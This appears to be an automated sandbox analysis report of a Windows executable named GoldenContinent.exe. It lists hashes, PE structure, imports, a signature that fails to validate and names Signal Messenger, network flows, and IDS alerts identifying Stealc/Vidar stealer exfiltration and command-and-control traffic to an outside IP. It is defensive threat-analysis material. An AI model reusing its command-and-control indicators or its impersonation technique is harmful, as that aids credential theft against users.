                                                                                                                                                                                                                                                                          Preview:)]}'.["",["military helicopter crash camp pendleton","daniel user","homestead movie angel studios","ripple xrp price prediction","nintendo switch 2 specs","sergio p.rez","solo leveling season 2 trailer","chinese satellite explosion"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWdiM3NreTk2EhRGb290YmFsbCBxdWFydGVyYmFjazLbD2RhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFCQlFFQkFBQUFBQUFBQUFBQUFBQUVBZ01GQmdjQkFQL0VBRFFRQUFJQkF3TUJCd01DQkFjQUFBQUFBQUVDQXdBRUVRVVNJVEVHRXlKQlVXR1JjWUdoc2NFeVV2RHhGQlVXSkRORDBmL0VBQm9CQUFJQ0F3QUFBQUFBQ
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):132739
                                                                                                                                                                                                                                                                          Entropy (8bit):5.436896434938398
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:fokJQ7O4N5dTm+syHEt4W3XdQ4Q6OuSr/nUW2i6o:fdQ7HTt/sHdQ4Q6ODfUW8o
                                                                                                                                                                                                                                                                          MD5:989461679C218C7FCFE622EC2F64F69F
                                                                                                                                                                                                                                                                          SHA1:5760375102A5643686D8A7EBFA2C9BB612E031F2
                                                                                                                                                                                                                                                                          SHA-256:2D0280A24EA40C8A808302B4FD4F9D7F1178A85569E74F35B68BA262B6A35FEE
                                                                                                                                                                                                                                                                          SHA-512:707D882F5F13AE58A0497ECEB6240381FC9B65DE9785E382BE13D54CA52A4F183489A89A2DD4C2BF0680B3E9FD6CEE31D3FB0F744484177A077DC167B65B2CF8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):5162
                                                                                                                                                                                                                                                                          Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                          MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                          SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                          SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                          SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                          Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Entropy (8bit):7.978519034566694
                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                          File name:GoldenContinent.exe
                                                                                                                                                                                                                                                                          File size:1'122'075 bytes
                                                                                                                                                                                                                                                                          MD5:7bc8c8c16081e8d9cebcce0d93bc5f8d
                                                                                                                                                                                                                                                                          SHA1:948d3349e7fc284fe648098d85ba7341258847f3
                                                                                                                                                                                                                                                                          SHA256:f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78
                                                                                                                                                                                                                                                                          SHA512:2a5fc41f2d958cb52466808ee664cef9f559c972bf029424a3936e1391c94213f38d18779297473cdd09bf90f83d5fa53ed05a8fca3e3b5e56e3d8cfe3608379
                                                                                                                                                                                                                                                                          SSDEEP:24576:znylYik3Jygua29LaP9r4ASTVSpe/E+oo+9c1K:7ylYi4wguaguVLyoEN+9c1K
                                                                                                                                                                                                                                                                          TLSH:EE3523D26F1AC82FC9D18A7119F4EA835D7CF4204875D83BB362C98C35A0389E7657A7
                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...D...B...8.....
                                                                                                                                                                                                                                                                          Icon Hash:1e3333421185db07
                                                                                                                                                                                                                                                                          Entrypoint:0x4038af
                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                          Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                          Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                                                          Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                                                          • 11/09/2024 20:33:41 12/09/2027 20:33:41
                                                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                                                          • CN="Signal Messenger, LLC", O="Signal Messenger, LLC", L=Mountain View, S=California, C=US, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=6703101, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                                                          Thumbprint MD5:D4E75D16F15BD3BC32ACDF4EAF83A59A
                                                                                                                                                                                                                                                                          Thumbprint SHA-1:8A5A56EFFDC462AE8A6CF732BB21E2541995BF36
                                                                                                                                                                                                                                                                          Thumbprint SHA-256:44DBAC9846A7E8F8EAE8BF0F9518B44FB86C257DD797742B767AF6ED1995AAF4
                                                                                                                                                                                                                                                                          Serial:4EF1C2D67B37517957F42E8D
                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                          sub esp, 000002D4h
                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                          mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                          call dword ptr [00409030h]
                                                                                                                                                                                                                                                                          push 00008001h
                                                                                                                                                                                                                                                                          call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                          call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                          push 00000008h
                                                                                                                                                                                                                                                                          mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                          call 00007FF2BC81747Bh
                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                          push 000002B4h
                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                          push 0040A264h
                                                                                                                                                                                                                                                                          call dword ptr [00409184h]
                                                                                                                                                                                                                                                                          push 0040A24Ch
                                                                                                                                                                                                                                                                          push 00476AA0h
                                                                                                                                                                                                                                                                          call 00007FF2BC81715Dh
                                                                                                                                                                                                                                                                          call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                          mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                          call 00007FF2BC81714Bh
                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                          call dword ptr [00409134h]
                                                                                                                                                                                                                                                                          cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                          mov eax, edi
                                                                                                                                                                                                                                                                          jne 00007FF2BC814A4Ah
                                                                                                                                                                                                                                                                          push 00000022h
                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                          mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                          call 00007FF2BC816E21h
                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                          call dword ptr [00409260h]
                                                                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                                                                          mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                          jmp 00007FF2BC814AD3h
                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                                                                          cmp ax, bx
                                                                                                                                                                                                                                                                          jne 00007FF2BC814A4Ah
                                                                                                                                                                                                                                                                          add esi, 02h
                                                                                                                                                                                                                                                                          cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                          • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                          • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x3d25e.rsrc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x10edab0x3170.rsrc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                          .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .rsrc0x1000000x3d25e0x3d40069cb5ea72e0dfab6478f194ea4ee8b1cFalse0.9886280293367347data7.96093609626921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .reloc0x13e0000xfd60x10009fe5fe5341a235c5cc875614b6fed086False0.59814453125data5.582792212884209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                          RT_ICON0x1001f00x3ae44PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9953071884586684
                                                                                                                                                                                                                                                                          RT_ICON0x13b0340x1840PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017719072164948
                                                                                                                                                                                                                                                                          RT_ICON0x13c8740x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6037234042553191
                                                                                                                                                                                                                                                                          RT_DIALOG0x13ccdc0x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                          RT_DIALOG0x13cddc0x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                          RT_DIALOG0x13cef80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                          RT_GROUP_ICON0x13cf580x30dataEnglishUnited States0.875
                                                                                                                                                                                                                                                                          RT_MANIFEST0x13cf880x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                          KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                          USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                          SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                          ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                          VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                          2024-12-22T22:47:37.428543+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.44974094.130.188.57443TCP
                                                                                                                                                                                                                                                                          2024-12-22T22:47:41.986571+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.44974294.130.188.57443TCP
                                                                                                                                                                                                                                                                          2024-12-22T22:47:41.987210+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config194.130.188.57443192.168.2.449742TCP
                                                                                                                                                                                                                                                                          2024-12-22T22:47:44.275191+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1194.130.188.57443192.168.2.449743TCP
                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:00.475101948 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:21.041963100 CET4972380192.168.2.42.20.68.201
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:21.162633896 CET80497232.20.68.201192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:21.162702084 CET4972380192.168.2.42.20.68.201
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:30.235991955 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:30.236080885 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:30.236195087 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:30.266796112 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:30.266860008 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.641160965 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.641236067 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.700752974 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.700822115 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.701715946 CET44349738149.154.167.99192.168.2.4
